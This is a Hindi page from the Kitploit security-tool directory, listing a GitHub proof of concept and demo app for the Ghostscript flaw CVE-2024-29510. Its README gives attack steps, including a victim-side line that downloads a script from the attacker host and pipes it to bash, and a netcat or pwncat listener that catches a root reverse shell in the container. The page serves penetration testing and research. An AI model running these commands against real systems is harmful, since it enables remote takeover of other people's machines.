Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-29510 — CVE-2024-29510 के लिए POC कोड और डेमो VulnApp | Kitploit
उपकरण/GitHubGitHub/swsmith2391/cve-2024-29510
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेलोड डेवलपमेंटकंटेनर एस्केपबाइनरी शोषण
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

CVE-2024-29510 के लिए POC कोड और डेमो VulnApp

रिपॉजिटरी देखें
1162 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मूल शोध और POC कोड: https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

नोट: मैंने निष्पादित कमांड के अलावा POC में कोई बदलाव नहीं किया है। पूरा श्रेय थॉमस रिन्समा @ Codean Labs को उनके अद्भुत शोध और POC के लिए जाता है।

स्थानीय परिदृश्य

  1. स्टेजर स्क्रिप्ट में लिपटा हुआ है जो होस्ट के कमजोर होने की जांच के लिए चेक स्क्रिप्ट डाउनलोड और चलाता है
  2. POC को Python3 रिवर्स शेल डाउनलोड और निष्पादित करने के लिए संशोधित किया गया
  3. स्टेजर और रिवर्स शेल STDIN के माध्यम से डाउनलोड और निष्पादित किए जाते हैं
  4. POC /tmp में रैंडम नाम के साथ एक आर्टिफैक्ट छोड़ता है

हमलावर होस्ट पर:

  1. pwncat-cs या netcat का उपयोग करके, 443 के लिए लिसनर बनाएं
  2. एक्सप्लॉइट डायरेक्टरी पर जाएं
  3. python3 -m http.server 80

पीड़ित होस्ट पर (Ubuntu 23.10, Ghostscript 10.01.2 चला रहा है):

  1. टर्मिनल खोलें और चलाएं: export RHOST=''; wget -q http://$RHOST/run -O - | bash &

दूरस्थ परिदृश्य (VulnApp)

  1. VulnApp बनाएं: 'docker build -t cve-2024-29510-demo:latest .' (इसके लिए Dockerfile डायरेक्टरी में https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz की एक प्रतिलिपि आवश्यक है)
  2. VulnApp चलाएं: 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. कार्यक्षमता जांचने के लिए good.ps को कन्वर्ट करने का प्रयास करें। इसे एक रेंडर किया हुआ PDF लौटाना चाहिए जिसमें रेखाएं एक तीर बनाती हैं, जैसे '>'
  4. पोर्ट 80 पर shell.html होस्ट करने के लिए वेब सर्वर सेटअप करें, उदा. 'python3 -m http.server 80'
  5. pwncat-cs या netcat का उपयोग करके, 443 के लिए लिसनर बनाएं
  6. bad.eps अपलोड करें, VulnApp हैंग हो जाएगा और लिसनर को कंटेनर के लिए एक रिवर्स शेल पकड़ना चाहिए (रूट के रूप में चल रहा है)
  • कंटेनर से भागें!
  • टूल डाउनलोड करें